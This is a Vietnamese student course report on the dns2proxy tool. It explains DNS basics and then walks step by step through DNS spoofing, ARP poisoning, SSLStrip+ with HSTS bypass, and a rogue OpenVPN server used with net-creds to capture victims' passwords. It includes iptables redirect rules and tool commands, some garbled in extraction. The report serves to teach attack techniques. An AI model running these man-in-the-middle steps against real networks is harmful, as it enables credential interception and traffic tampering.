1. Trang chủ
  2. » Kỹ Năng Mềm

Bài tập lớn môn an toàn mạng (49)

36 12 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 36
Dung lượng 1,89 MB

Nội dung

HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CƠNG NGHỆ THƠNG TIN Học phần: An tồn mạng Bài báo cáo: Tìm hiểu tool Dns2Proxy Giảng viên hướng dẫn: TS Đặng Minh Tuấn Sinh viên thực hiện: Nhóm Đỗ Quang Huy B18DCAT106 Hà Nội 2021 MỤC LỤC MỤC LỤC LỜI MỞ ĐẦU DANH SÁCH CÁC THUẬT NGỮ TIẾNG ANH VÀ VIẾT TẮT DANH MỤC CÁC HÌNH VẼ Chương Khái quát DNS Proxy DNS Proxy 14 Chương : Khái quát tool Dns2Proxy cài đặt 20 Khái quát tool DNS2Proxy 20 Cài đặt Tool Dns2Proxy 20 Chương : Các dạng công Dns2Proxy 21 Giả mạo DNS truyền thống thêm địa IP gốc vào phản hồi 21 Giả mạo cách thêm địa IP đầu yêu cầu 22 Mô tả tệp cấu hình dns2proxy 24 Chương : Tấn công kết hợp tool để thực thực tế 25 Sử dụng SSlstrip dns2proxy để bỏ qua HSTS 25 sử dụng Router Scan by Stas'M Phần ba: Sử dụng VPN giả mạo (Tấn công người + Bỏ qua HSTS) 27 Kết Luận 34 Tài Liệu tham khảo 35 LỜI MỞ ĐẦU Những năm gần đây, vai trị An tồn thơng tin nước ngày lớn mạnh Từ chỗ sử dụng để hỗ trợ số hoạt động văn phòng, hệ thống thơng tin trở nên có vai trị chiến lược doanh nghiệp Đặc biệt thành tựu công nghệ thông tin (CNTT) khiến doanh nghiệp ngày ý tới việc áp dụng để gia tăng ưu cạnh tranh tạo hội cho Hiện nay, trào lớn ứng dụng thành tựu ATTT không giới hạn doanh nghiệp lớn, tầm cỡ đa quốc gia mà lan rộng tất doanh nghiệp, kể doanh nghiệp vừa nhỏ nước phát triển Trong thời đại 4.0 mà An tồn thơng tin chủ đề nóng Hàng tram chí đến hàng triệu đồ điện tử sử dụng ngày an tồn lĩnh vực cơng nghệ thơng tin xu Trong tiểu luận lần (em) xin phép giới thiệu số tool phổ biến Kali Linux năm 2014 – 2016 Dns2Proxy DNS Spoofing nói cách rõ rang giả mạo địa DNS Qua em xin giới thiệu lại DNS Proxy để Thầy bạn hiểu rõ chúng Bởi lẽ nghe nhiều đến chúng em xin phép giới thiệu để hiểu rõ chúng Em Xin chân trọng cảm ơn!! DANH SÁCH CÁC THUẬT NGỮ TIẾNG ANH VÀ VIẾT TẮT Từ Viết Tắt Thuật ngữ tiếng Anh / giải thích Thuật ngữ tiếng Việt/ giải thích DNS Domain Name System Hệ thống phân giải tên miền LAN Local Area Network Mạng cục IP Internet Protocol Địa đơn mà thiết bị sử dụng VPN Virtual Private Network Mạng riêng ảo MITM Man-in-the-midle Tấn công người đứng VoIP Voice-over IP Nghe Dos Denial Of Service Tấn công từ chối dịch vụ SSL Secure Socket Layer Bộ giao thức bảo mật SSL TCP Transmission Control Protocol Giao thức điều khiển truyền vận UDP User Datagram Protocol Giao thức Dữ liệu Người dùng HSTS HTTP Strict Transport Security Bảo mật truyền tải nghiêm ngặt HTTP HTTP Hypertext Transfer Protocol Giao thức Truyền tải Siêu Văn Bản DANH MỤC CÁC HÌNH VẼ Hình Hệ thống phân giải tên miền DNS Hình Root sever name .8 Hình Hệ thống máy chủ riêng DNS đơn vị .9 Hình Cách thức hoạt động DNS .10 Hình 5: Cài DNS cho máy tính 12 Hình 6: Dns dễ bị công mitm .13 Hình Proxysever hỗ trợ lọc ứng dụng không phù hợp 15 Hình Server Proxy mở rộng kết nối hiệu Internet 15 Hình Proxy Server bảo tồn băng thơng mạng 16 Hình 10 Khái quát DNS Spoofing 20 Chương Khái quát DNS Proxy DNS 1.1 DNS Là gì? DNS viết tắt cụm từ Domain Name System , mang ý nghĩa đầy đủ Hệ thống phân giải tên miền DNS phát minh vào năm 1984 cho Internet , hệ thống cho phép thiết lập tương ứng địa ip tên miền [1] DNS hệ thống chuyển đổi tên miền website mà sử dụng , dạng www.tenmien.com sang địa IP tương ứng với tên miền ngược lại Thao tác DNS giúp liên kết thiết bị mạng với nhằm mục đích định vị gán địa cụ thể cho thơng tin internet Hình Hệ thống phân giải tên miền DNS 1.2 Chức DNS Về chức năng, DNS hiểu “người phiên dịch” “truyền đạt thông tin” DNS làm công việc dịch tên miền thành địa IP gồm nhóm số khác Ví dụ www.tenmien.com thành 421.64.874.899 ngược lại dịch địa IP thành tên miền Mỗi máy tính Internet có địa IP Địa IP dùng để thiết lập kết nối server máy khách để khởi đầu kết nối Bất kỳ nào, bạn truy cập vào website tùy ý gửi email, DNS đóng vai trị quan trọng trường hợp Tuy nhiên, địa IP sử dụng tảng kết nối thiết bị mạng Đó nơi DNS làm việc phân giải tên domain thành địa IP để thiết bị mạng giao tiếp với Đồng thời, bạn tải website cách nhập trực tiếp địa IP thay nhập tên domain website 1.3 Các loại ghi DNS - CNAME Record (Bản ghi CNAME): Cho phép bạn tạo tên mới, điều chỉnh trỏ tới tên gốc đặt TTL Tóm lại, tên miền muốn đặt nhiều tên khác cần có ghi - - - - A Record: Bản ghi sử dụng phổ biến để trỏ tên Website tới địa IP cụ thể Đây ghi DNS đơn giản nhất, cho phép bạn thêm Time to Live (thời gian tự động tái lại ghi), tên Points To ( Trỏ tới IP nào) MX Record: Với ghi này, bạn trỏ Domain đến Mail Server, đặt TTL, mức độ ưu tiên (Priority) MX Record định Server quản lý dịch vụ Email tên miền AAAA Record: Để trỏ tên miền đến địa IPV6 Address, bạn cần sử dụng AAA Record Nod cho phép bạn thêm Host mới, TTL,IPv6 TXT Record: Bạn thêm giá trị TXT, Host mới, Points To, TTL Để chứa thông tin định dạng văn Domain, bạn cần đến ghi SRV Record: Là ghi dùng để xác định xác dịch vụ chạy Port Đay Record đặc biệt DNS Thơng qua nó, bạn thêm Name, Priority, Port, Weight, Points to, TTL NS Record: Với ghi này, bạn định Name Server cho Domain phụ Bạn tạo tên Name Server, Host mới, TTL 1.4 Các loại DNS vai trị Các DNS Server bao gồm: - Root Name Server Local Name Server Cụ thể sau: Root Name Server : Đây máy chủ tên miền chứa thơng tin, để tìm kiếm máy chủ tên miền lưu trữ (authority) cho tên miền thuộc mức cao (top-level-domain) Sau đó, máy chủ tên miền mức top-level-domain cung cấp thông tin địa máy chủ authority cho tên miền mức second-level-domain chứa tên miền muốn tìm Quá trình tìm kiếm tiếp tục máy chủ tên miền authority cho tên miền muốn tìm Theo chế hoạt động bạn tìm kiếm tên miền không gian tên miền Một điểm đáng ý khác, q trình tìm kiếm tên miền ln bắt đầu truy vấn gửi cho máy chủ ROOT Nếu máy chủ tên miền mức ROOT khơng hoạt động, q trình tìm kiếm không thực Để tránh điều xảy ra, mạng Internet có 13 hệ thống máy chủ tên miền mức ROOT Các máy chủ tên miền nói chung hệ thống nói riêng đặt nhiều vị trí khác mạng Internet Hình Root sever name Local Name Sever : Server chứa thông tin, để tìm kiếm máy chủ tên miền lưu trữ cho tên miền thấp Nó thường trì doanh nghiệp, nhà cung cấp dịch vụ Internet (ISPs) Hình Hệ thống máy chủ riêng DNS đơn vị Cơ chế hoạt động DNS : Giả sử muốn truy cập vào trang có địa matbao.vn Trước hết chương trình máy người sử dụng gửi yêu cầu tìm kiếm địa IP ứng với tên miền matbao.vn tới máy chủ quản lý tên miền (name server) cục thuộc mạng Máy chủ tên miền cục kiểm tra sở liệu có chứa sở liệu chuyển đổi từ tên miền sang địa IP tên miền mà người sử dụng yêu cầu không Trong trường hợp máy chủ tên miền cục có sở liệu này, gửi trả lại địa IP máy có tên miền nói Trong trường hợp máy chủ tên miền cục khơng có sở liệu tên miền hỏi lên máy chủ tên miền mức cao (máy chủ tên miền làm việc mức ROOT) Máy chủ tên miền mức ROOT cho máy chủ tên miền cục địa máy chủ tên miền quản lý tên miền có Tiếp đó, máy chủ tên miền cục gửi yêu cầu đến máy chủ quản lý tên miền Việt Nam (.VN) tìm tên miền matbao.vn Máy chủ tên miền cục hỏi máy chủ quản lý tên miền vnn.vn địa IP tên miền matbao.vn Do máy chủ quản lý tên miền vnn.vn có sở liệu tên miền Vì code Python cần làm tiếp chữa lỗi Traceback (most recent call last): File "dns2proxy.py", line 21, in import dns.message ImportError: No module named dns.message Cụ thể sau : Và cách để cài đặt khơng cịn bị lỗi thư viện DNS.proxy [4] Chương : Các dạng công Dns2Proxy Giả mạo DNS truyền thống thêm địa IP gốc vào phản hồi Sử dụng tệp spoof.cfg: 21 tên máy chủ ip.ip.ip.ip Hoặc sử dụng tệp domains.cfg để giả mạo tất máy chủ miền: Giả mạo cách thêm địa IP đầu yêu cầu Để khởi động công này, có shellcript tự động cấu hình hệ thống để sử dụng bảng IP Bạn phải chỉnh sửa tệp cho phù hợp với hệ thống ĐỪNG QUÊN biến AdminIP !!!!! 22 Cả hai IP phải hệ thống phép dns2proxy.py thiết lập chuyển tiếp 23 Tập lệnh fhtang.sh đóng chương trình khơi phục iptables bình thường Tên máy chủ nospoof.cfg không giả mạo Mô tả tệp cấu hình dns2proxy domains.cfg (hoặc dominios.cfg): giải tất máy chủ có danh sách miền theo danh sách IP Ví dụ: facebook.com 1.2.3.4 fbi.gov 1.2.3.4 spoof.cfg: Máy chủ giả mạo có ip Ví dụ: www.nsa.gov 127.0.0.1 nospoof.cfg: Gửi phản hồi hợp lệ máy chủ u cầu Ví dụ: mail.google.com nospoofto.cfg: Khơng gửi phản hồi IP giả từ danh sách Ví dụ : 127.0.0.1 4.5.6.8 victim.cfg: Nếu khơng có sản phẩm nào, gửi phản hồi giả đến địa IP Vị dụ: 23.66.163.36 195.12.226.131 Resolutionv.conf: Máy chủ DNS để truyền yêu cầu Vị dụ : nameserver 8.8.8.8 24 Chương : Tấn công kết hợp tool để thực thực tế Sử dụng SSlstrip dns2proxy để bỏ qua HSTS Có thuyết trình việc sử dụng SSLStrip + dns2proxy , số video từ người đam mê vấn đề này, tơi khơng tìm thấy hướng dẫn bước đầy đủ cách thức việc cần làm Do đó, ghi lấp đầy khoảng trống, cố gắng mô tả việc khởi chạy SSLStrip + dns2proxy cách đầy đủ bước Tôi thử nghiệm BlackArch, chất lệnh chúng hoạt động, chẳng hạn Kali Linux Trong trình thử nghiệm, tơi thay giao thức HTTPS HTTP cho trang web google.com, yandex.ru, vk.com, không thành công cho facebook.com, mail.ru (tôi chưa thử trang khác) Cài đặt gói chúng tơi cần: sudo pacman -S python2-service-identity ettercap-gtk Xin lưu ý không cài đặt SSLStrip dns2proxy từ kho lưu trữ Vì dns2proxy khơng có kho lưu trữ BlackArch SSLStrip trình bày phiên thơng thường (khơng phải SSLStrip +) Tất lệnh thực cách đăng nhập thư mục gốc Chuyển máy bạn sang chế độ chuyển tiếp sudo echo "1" > /proc/sys/net/ipv4/ip_forward Định cấu hình iptables để chuyển hướng lưu lượng HTTP: sudo iptables -t nat j REDIRECT to-port sudo iptables -t nat j REDIRECT to-port -A PREROUTING -p tcp destination-port 80 2000 -A PREROUTING -p udp destination-port 53 53 Tải xuống chạy SSLStrip + 25 Tải xuống chạy dns2proxy: Tiếp theo, gặp số xui xẻo với arpspoof mạng LAN Nhân tiện, BlackArch, arpspoof gọi smikims-arpspoof Vì số lý do, lệnh không hoạt động Với mạng LAN, làm điều Đã tìm kiếm IP nạn nhân: sudo nmap -sn 192.168.1.0/24 Và chạy chương trình với đối số sau: sudo lans -u -p -d -ip 192.168.1.33 -i enp0s3 Về bản, việc giả mạo đánh diễn ra, với trợ giúp NetCreds, tơi thấy thơng tin đăng nhập mật bị chặn, tất điều vượt qua SSLStrip + dns2proxy: sudo net-creds -i enp0s3 Nhân tiện, mạng LAN thoát ngồi, thực dọn dẹp, tức bạn cần bật lại quy tắc chuyển tiếp tường lửa Sau đó, tơi định sử dụng Ettercap để giả mạo Tôi làm theo sơ đồ cổ điển: Khởi chạy giao diện đồ họa ( -G ): sudo ettercap -G 26 Trong menu, chọn Sniff, sau chọn Unified, chọn giao diện mong muốn: Bây chọn Máy chủ, mục Qt tìm máy chủ Sau quét xong chọn danh sách Máy chủ Chọn định tuyến làm Target1 (Thêm vào mục tiêu 1), Target2 chọn thiết bị mà bạn công (Thêm vào mục tiêu 2) Bây chuyển sang mục menu Mitm Tại đó, chọn ARP độc Đánh dấu vào hộp kiểm Sniff remote results Tơi dừng lại đó, SSLStrip + dns2proxy hoạt động Mặc dù SSLStrip + rõ ràng hoạt động (đã hạ cấp giao thức xuống HTTP), lỗi liên tục xuất cửa sổ chương trình - có lẽ hành vi bình thường Sử dụng Router Scan by Stas'M Phần ba: Sử dụng VPN giả mạo (Tấn công người + Bỏ qua HSTS) Vấn đề : Có thể công man-in-the-middle mà không cần truy cập vào mạng cục khơng? [5] Nếu truy cập vào thiết bị mạng từ Internet (ví dụ: sử dụng Quét định tuyến Stas'M ), khơng có quyền truy cập vào mạng cục bộ, khơng thể thực thao tác man-in -middle cơng Hay có thể? Trên thực tế Dưới ví dụ cách làm điều Hơn nữa, sử dụng SSLStrip + dns2proxy để bỏ qua Bảo mật truyền tải nghiêm ngặt HTTP (HSTS) sử dụng Net-Creds để dễ dàng thu thập mật thông tin nhạy cảm khác Nếu bạn nhìn vào thứ tự địn cơng man-in-the-middle "bình thường", sau: - qt mạng cục để tìm kiếm thiết bị hoạt động - Giả mạo ARP, nghĩa mục tiêu bắt đầu nghĩ lưu lượng truy cập nên gửi qua định tuyến, mà thơng qua máy tính kẻ cơng - để mục tiêu hoạt động Internet, kẻ công chuyển hướng yêu cầu từ mục tiêu đến mạng toàn cầu chuyển phản hồi nhận đến mục tiêu Về chất, kẻ công bắt đầu đóng vai trị proxy Đồng thời, kẻ cơng thực việc sau với lưu lượng truyền: 27 - phân tích theo cách nào, chẳng hạn, để tìm mật liệu khác truyền dạng khơng mã hóa chặn quyền truy cập vào trang web định chuyển hướng đến trang web gian lận cố gắng hạ cấp giao thức từ HTTPS xuống HTTP để giảm lượng liệu truyền dạng mã hóa tăng lượng truyền dạng văn túy - chèn nhiều nội dung khác vào trang web, bao gồm nội dung gây hiểu lầm dẫn đến việc máy tính bạn bị nhiễm mã độc Tóm lại, proxy làm thứ hầu hết thứ với lưu lượng truyền Nhưng, để nhắc bạn, công man-in-themiddle, thực mạng cục bắt đầu việc giả mạo ARP, điều xảy mạng toàn cầu Những thứ sau có quyền truy cập vào định tuyến, cần tìm cách làm cho truyền lưu lượng truy cập cho chúng ta, tức tương tác với mạng tồn cầu thơng qua chúng tơi Có vẻ chức proxy khơng tìm thấy định tuyến Nhưng VPN Bản chất VPN máy khách thiết lập kênh mã hóa với máy chủ thơng qua máy chủ đến mạng tồn cầu Những thứ máy khách, mà khơng có hành vi giả mạo ARP khác, truyền lưu lượng truy cập đến máy tính từ xa! Và có máy t ính từ xa này, bạn thực công man-in-the-middle với tất khả mô tả trên! Nếu VPN bạn, thực tế với lưu lượng VPN truyền qua kênh mã hóa khơng quan trọng, lưu lượng máy chủ giải mã trường hợp bên "hộp" "đi" rõ ràng Những thứ khái niệm rõ ràng: - cần thiết lập VPN giả mạo bạn - định cấu hình thiết bị mạng nạn nhân để thiết bị hoạt động thông qua VPN - thực loại công máy chủ để chặn / sửa đổi / chặn lưu lượng truyền Nếu thực cho rễ, sau nhờ vào VPN tạo mạng lưới khu vực địa phương qua kết nối Internet Trên mạng cục này, máy chủ VPN không cổng lý mà nhận tất lưu lượng truy cập mà khơng có ARP giả mạo Về lý thuyết, thứ diễn suôn sẻ đơn giản Nhưng mơ hình định tuyến khác hỗ trợ triển khai VPN khác Sự đa dạng không phù hợp với tất tùy chọn cài đặt cấu hình VPN Tơi chọn số chúng - OpenVPN Có định tuyến hỗ trợ OpenVPN Nhưng mục đích đăng để hiển thị khái niệm làm việc, để đưa dẫn 28 chung Trong trường hợp, thiết bị cụ thể, bạn cần thực cài đặt đặc biệt cho máy chủ VPN Nhân tiện, OpenVPN chạy nhiều hệ điều hành phổ biến khác nhau, tức Nếu bạn có quyền truy cập vào thiết bị mạng bạn dễ dàng kết nối máy quan tâm để "bảo mật OpenVPN mã hóa liệu để hacker khơng thể đánh chặn" BƯỚC 1: Mở tệp với cài đặt máy chủ: vim /etc/openvpn/server.conf Nếu có dịng này: push "dhcp-option DNS 8.8.8.8" Sau thay đổi thành dịng: push "dhcp-option DNS IP_сервера_с_dns2proxy" Điều buộc mục tiêu sử dụng proxy DNS làm máy chủ DNS Ví dụ: OpenVPN giả mạo tơi đặt thành IP 185.117.153.79, dns2proxy khởi chạy đó, trường hợp tơi, dịng trông này: push "dhcp-option DNS 185.117.153.79" OpenVPN sử dụng UDP theo mặc định SSLStrip + không thấy lưu lượng này, chúng tơi thay đổi giao thức từ UDP sang TCP Những thứ chuỗi proto udp Mỗi dòng proto tcp Đang thử nghiệm máy chủ OpenVPN openvpn /etc/openvpn/server.conf Và khởi động lại systemctl restart openvpn@server.service systemctl status openvpn@server Trên máy khách chọn giao thức TCP, ví dụ: HĐH máy tính để bàn tệp cấu hình 29 Và khởi động lại : sudo systemctl restart openvpn@client Trên máy chủ, quy tắc khác cho iptables sử dụng để "chuyển tiếp" lưu lượng truy cập Dưới ví dụ tệp máy chủ : #!/bin/sh echo > /proc/sys/net/ipv4/ip_forward PRIVATE=10.8.0.0/24 LOOP=127.0.0.1 iptables -P INPUT DROP iptables -P FORWARD DROP iptables -F iptables -P OUTPUT ACCEPT iptables -P INPUT DROP iptables -P FORWARD DROP iptables iptables iptables iptables -A -A -A -A INPUT -i ens3 -s $LOOP -j DROP FORWARD -i ens3 -s $LOOP -j DROP INPUT -i ens3 -d $LOOP -j DROP FORWARD -i ens3 -d $LOOP -j DROP iptables iptables iptables iptables iptables iptables -A -A -A -A -A -A FORWARD -i ens3 -s 192.168.0.0/16 -j DROP FORWARD -i ens3 -s 172.16.0.0/12 -j DROP FORWARD -i ens3 -s 10.8.0.0/8 -j DROP INPUT -i ens3 -s 192.168.0.0/16 -j DROP INPUT -i ens3 -s 172.16.0.0/12 -j DROP INPUT -i ens3 -s 10.8.0.0/8 -j DROP iptables iptables iptables iptables -A -A -A -A FORWARD -p tcp sport 137:139 -o ens3 -j DROP FORWARD -p udp sport 137:139 -o ens3 -j DROP OUTPUT -p tcp sport 137:139 -o ens3 -j DROP OUTPUT -p udp sport 137:139 -o ens3 -j DROP iptables -A INPUT -s $LOOP -j ACCEPT iptables -A INPUT -d $LOOP -j ACCEPT iptables iptables iptables iptables -A -A -A -A INPUT INPUT INPUT INPUT -p -p -p -p tcp tcp tcp tcp dport dport dport dport http -j ACCEPT 22 -j ACCEPT 80 -j ACCEPT 443 -j ACCEPT 30 iptables -A INPUT -p udp dport 1194 -j ACCEPT iptables iptables iptables iptables -A -A -A -A INPUT -i tun+ -j ACCEPT FORWARD -i tun+ -j ACCEPT INPUT -i tap+ -j ACCEPT FORWARD -i tap+ -j ACCEPT iptables iptables iptables iptables -A -A -A -A OUTPUT -m state state NEW -o ens3 -j ACCEPT INPUT -m state state ESTABLISHED,RELATED -j ACCEPT FORWARD -m state state NEW -o ens3 -j ACCEPT FORWARD -m state state ESTABLISHED,RELATED -j ACCEPT iptables -t nat -A POSTROUTING -s $PRIVATE -o ens3 -j MASQUERADE Mọi thứ giữ nguyên, ngoại trừ dòng này: iptables -A INPUT -p upd dport 1194 -j ACCEPT cần thay đổi thành (một lần nữa, thay đổi giao thức): iptables -A INPUT -p tcp dport 1194 -j ACCEPT Bước : Đánh chặn tên người dùng mật VPN Bây bạn sử dụng phần mềm bạn quen để chặn sửa đổi liệu Ví dụ, để xem mật khẩu, sử dụng Net-Creds: net-creds -i tun0 Chú ý đến giao diện mạng chọn - tun0 Đây tên giao diện vật lý thực, giao diện mà VPN máy chủ kết nối với máy khách Ngoài ra, bạn chèn hook BeEF mã HTML JavaScript Bước : Bỏ qua phần HSTS Lưu lượng mã hóa, tỷ lệ khơng ngừng tăng lên, khơng cho phép nhìn vào bên thơng tin truyền Một loạt SSLStrip + dns2proxy giúp chúng tơi giải vấn đề chí bỏ qua phần HSTS Chúng đặt phụ thuộc cần thiết (được hiển thị ví dụ BlackArch, đăng nhập thư mục gốc): pacman -S python2-service-identity python2-pcapy Hãy bắt đầu cách thêm quy tắc định tuyến máy chủ VPN: 31 iptables -t nat -A PREROUTING -p tcp destination-port 80 -j REDIRECT to-port 2000 iptables -t nat -A PREROUTING -p tcp destination-port 1194 -j REDIRECT to-port 2000 iptables -t nat -A PREROUTING -p udp destination-port 53 -j REDIRECT to-port 53 Tải xuống chạy SSLStrip + dns2Proxy Bây bạn chạy lại Net-Creds, lần có nhiều mật chụp lại net-creds -i tun0 Như bạn thấy từ ảnh chụp hình sau đây, yandex.ru, vk.com, google.com người khác cho tốt trước công này: 32 33 Kết Luận Bài báo cáo em trình bày khái niệm tổng quát DNS Proxy giới thiệu sơ qua Tool Dns2Proxy ứng dụng việc khai thác công DNS Spoofing MITM Biết cách giả mạo địa DNS nạn nhân Kết hợp với tool khác để thực công thực tế Một lần em xin chân thành cảm ơn Thầy bạn đọc báo cáo em Bài có vài thiếu xót mong góp ý chân thành thầy cô bạn để viết em đầy đủ thành công Em xin chân thành cảm ơn ! 34 Tài Liệu tham khảo [1] https://wiki.matbao.net/dns-la-gi-tam-quan-trong-cua-dns-trong-the-gioi-mang/#ly-do-dns-de-bitan-cong-la-gi [Online] [2] https://wiki.matbao.net/proxy-server-la-gi-cach-ket-noi-internet-an-toan-cho-nguoi-dung/ [Online] [3] https://kali.tools/?p=474 [Online] [4] http://www.xinbiancheng.cn/python3/python-method-dns.message.html [Online] [5] https://hackware.ru/?p=755 [Online] [6] https://www.blackmoreops.com/2017/03/22/dns2proxy-offensive-dns-server-post-explotationtool/?fbclid=IwAR3d14AoCk1sMjL2SNHVZWE7IlSX3HAx28DiF8aaLiXI8Lb1KvOHCjte E [Online] 35 ... doanh nghiệp ngày ý tới việc áp dụng để gia tăng ưu cạnh tranh tạo hội cho Hiện nay, trào lớn ứng dụng thành tựu ATTT không giới hạn doanh nghiệp lớn, tầm cỡ đa quốc gia mà lan rộng tất doanh... đến mạng doanh nghiệp mà doanh nghiệp cung cấp cho người dùng từ xa Doanh nghiệp dễ dàng kiểm sốt xác minh người dùng việc dùng VPN Từ người dùng truy cập vào tài nguyên sử dụng kết nối an toàn. .. tiên, bạn vào phần Control Panel, nhấn Start Menu lên sau gõ Control Panel thấy Bước 2: Tại bạn truy cập vào View network status and tasks Bước 3: Sau truy cập vào mạng internet bạn sử dụng Bước

Ngày đăng: 08/01/2022, 10:54

HÌNH ẢNH LIÊN QUAN

Hình 1 Hệ thống phân giải tên miền DNS - Bài tập lớn môn an toàn mạng (49)
Hình 1 Hệ thống phân giải tên miền DNS (Trang 6)
Hình 2 Root sever name - Bài tập lớn môn an toàn mạng (49)
Hình 2 Root sever name (Trang 9)
Hình 3 Hệ thống máy chủ riêng DNS của mỗi đơn vị - Bài tập lớn môn an toàn mạng (49)
Hình 3 Hệ thống máy chủ riêng DNS của mỗi đơn vị (Trang 10)
Hình 4 Cách thức hoạt động của DNS - Bài tập lớn môn an toàn mạng (49)
Hình 4 Cách thức hoạt động của DNS (Trang 11)
Hình 5: Cài DNS cho máy tính - Bài tập lớn môn an toàn mạng (49)
Hình 5 Cài DNS cho máy tính (Trang 13)
Hình 6: Dns dễ bị tấn công mitm - Bài tập lớn môn an toàn mạng (49)
Hình 6 Dns dễ bị tấn công mitm (Trang 14)
Hình 8 Server Proxy mở rộng kết nối hiệu quả trong Internet - Bài tập lớn môn an toàn mạng (49)
Hình 8 Server Proxy mở rộng kết nối hiệu quả trong Internet (Trang 16)
Hình 7 Proxysever hỗ trợ lọc ứng dụng không phù hợp - Bài tập lớn môn an toàn mạng (49)
Hình 7 Proxysever hỗ trợ lọc ứng dụng không phù hợp (Trang 16)
Hình 9 Proxy Server có thể bảo tồn băng thông mạng - Bài tập lớn môn an toàn mạng (49)
Hình 9 Proxy Server có thể bảo tồn băng thông mạng (Trang 17)
Giả mạo DN S, còn được gọi là nhiễm độc bộ nhớ cache DN S, là một hình thức tấn công máy tính trong đó dữ liệu Hệ thống tên miền bị hỏng được đưa vào bộ nhớ  cache của trình phân giải DNS , khiến máy chủ định danh trả về địa chỉ IP không  chính xác - Bài tập lớn môn an toàn mạng (49)
i ả mạo DN S, còn được gọi là nhiễm độc bộ nhớ cache DN S, là một hình thức tấn công máy tính trong đó dữ liệu Hệ thống tên miền bị hỏng được đưa vào bộ nhớ cache của trình phân giải DNS , khiến máy chủ định danh trả về địa chỉ IP không chính xác (Trang 21)
w